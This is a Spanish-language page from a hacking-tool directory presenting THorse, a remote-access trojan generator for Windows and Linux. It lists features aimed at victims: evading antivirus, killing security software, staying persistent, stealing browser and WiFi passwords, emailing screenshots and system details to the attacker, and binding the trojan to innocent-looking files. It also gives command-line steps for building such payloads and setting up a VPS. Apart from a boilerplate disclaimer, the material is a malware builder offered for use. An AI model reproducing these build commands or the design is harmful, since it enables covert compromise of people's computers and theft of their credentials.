Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
thorse — THorse es un generador de RAT (Troyano de Administración Remota) para sistemas Windows/Linux escrito en Python 3. | Kitploit
Herramientas/GitHubGitHub/pushpenderindia/thorse
Descifrado de ContraseñasFrameworks de ExploitsGeneración de PayloadsMecanismos de PersistenciaEvasión de IDS/IPSPost-ExplotaciónComando y ControlTroyano de Acceso RemotoAnti-Bot
GitHubpushpenderindia/thorse

thorse

THorse es un generador de RAT (Troyano de Administración Remota) para sistemas Windows/Linux escrito en Python 3.

61412663hace 3 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio

THorse

THorse es un generador de RAT (troyano de administración remota) para sistemas Windows/Linux escrito en Python 3.

                    Este pequeño script de Python puede hacer un trabajo realmente increíble.

Descargo de responsabilidad

:computer: Este proyecto fue creado solo con fines legítimos y para uso personal.

ESTE SOFTWARE SE PROPORCIONA "TAL CUAL" SIN GARANTÍA DE NINGÚN TIPO. PUEDES UTILIZAR ESTE SOFTWARE BAJO TU PROPIO RIESGO. EL USO ES COMPLETA RESPONSABILIDAD DEL USUARIO FINAL. LOS DESARROLLADORES NO ASUMEN NINGUNA RESPONSABILIDAD Y NO SON RESPONSABLES DE NINGÚN USO INDEBIDO O DAÑO CAUSADO POR ESTE PROGRAMA.

Características

  • Funciona en Windows/Linux
  • Notifica a la nueva víctima por correo electrónico
  • Indetectable
  • No requiere privilegios de root o administrador
  • Persistencia
  • Envía una captura de pantalla de la pantalla del PC de la víctima por correo electrónico
  • Da acceso total a Meterpreter al atacante
  • Nunca requirió Metasploit instalado para crear el troyano
  • Crea un binario ejecutable con cero dependencias
  • Crea un payload de menor tamaño ~5 mb con funcionalidad avanzada
  • Ofusca el payload antes de compilarlo, evadiendo así algunos antivirus más
  • El payload generado está codificado con Base64, lo que hace extremadamente difícil la ingeniería inversa del payload
  • Mata el antivirus en el PC de la víctima e intenta desactivar el Centro de seguridad de Windows
  • Interfaz colorida e impresionante para generar payloads
  • En el lado del atacante: al crear el payload, el script detecta automáticamente las dependencias faltantes y las instala
  • Capacidad de añadir un icono personalizado al archivo malicioso
  • Binder integrado que puede vincular el ejecutable a cualquier archivo [.pdf, .txt, .exe, etc.], ejecutando el archivo legítimo en primer plano y los códigos maliciosos en segundo plano como un servicio.
  • Comprueba si ya hay una instancia en ejecución en el sistema; si se encuentra una instancia en ejecución, solo se ejecuta el archivo legítimo [Prohibidor de múltiples instancias].
  • El atacante puede crear/compilar para Windows/Linux OS usando un sistema Linux, pero solo puede crear/compilar un ejecutable de Windows usando una máquina Windows.
  • Recupera contraseñas guardadas del sistema de la víctima y las envía al atacante.
Recuperaciones admitidas, intenta recuperar contraseñas guardadas de:
Navegador Chrome
WiFi

Nota: El stealer personalizado está codificado, no depende de LaZagne

Probado en

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Las siguientes son las limitaciones del payload de meterpreter generado con metasploit:-

  • Hay que ejecutar el listener de Metasploit antes de ejecutar la backdoor
  • La backdoor en sí no se vuelve persistente; tenemos que usar los módulos de post-explotación para hacerla persistente. Y los módulos de post-explotación solo pueden usarse después de una explotación exitosa.
  • No nos notifica cuando el payload se ejecuta en un sistema nuevo.

Todos sabemos lo potente que es el payload de Meterpreter, pero aún así el payload creado con él no es satisfactorio.

Las siguientes son las características de este generador de payloads que te darán una buena idea de este script de Python:-

  • Usa el registro de Windows para volverse persistente en Windows.
  • También logra volverse persistente en sistemas Linux.
  • El payload puede ejecutarse tanto en LINUX como en WINDOWS.
  • Proporciona acceso completo, ya que se puede usar el listener de metasploit y también soporta un listener personalizado (puedes crear tu propio listener).
  • Envía una notificación por correo electrónico, cuando el payload se ejecuta en un sistema nuevo, con información completa del sistema.
  • Genera el payload en 1 minuto o incluso menos.
  • Soporta todos los módulos de post-explotación de meterpreter.
  • El payload se puede crear tanto en Windows como en Linux.

Requisitos previos

  • Python 3.X
  • Algunos módulos externos

Por favor, ten en cuenta:

En Windows, especifica/establece la ruta de Pyinstaller en paygen.py [Línea 14]

La ruta predeterminada es esta : PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

Cámbiala de acuerdo a tu sistema

Cómo usar en Linux

# Install dependencies 
$ Install latest python 3.x

# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/thorse.git

# Go into the repository
$ cd thorse

# Installing dependencies
$ bash installer_linux.sh

# If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py

$ chmod +x paygen.py
$ python3 paygen.py --help

# Making Payload/RAT
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload/RAT with Custom AVKiller [By Default, Tons of Know AntiVirus is added in Kill_Targets]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# Making Payload/RAT with Custom Time to become persistence
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

Cómo usar en VPS (Recomendado)

# 1. Setup a VPS, You can buy Ubuntu VPS from any VPS Provider such as Digital Ocean, Linode, AWS, etc

# 2. Connect to your VPS Using SSH
$ ssh username@ip_address

# 3. Update Your Linux VPS
$ sudo apt update

# 4. Add Kali Linux Repository
$ sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"

# 5. Install gnupg package
$ sudo apt install gnupg

# 6. Add Kali Public Keys
$ wget 'https://archive.kali.org/archive-key.asc' && sudo apt-key add archive-key.asc

# 7. Update VPS
$ sudo apt update

# 8. Set Kali Priority
$ sudo sh -c "echo 'Package: *'>/etc/apt/preferences.d/kali.pref; echo 'Pin: release a=kali-rolling'>>/etc/apt/preferences.d/kali.pref; echo 'Pin-Priority: 50'>>/etc/apt/preferences.d/kali.pref"

# 9. Update VPS
$ sudo apt update
Descargar herramienta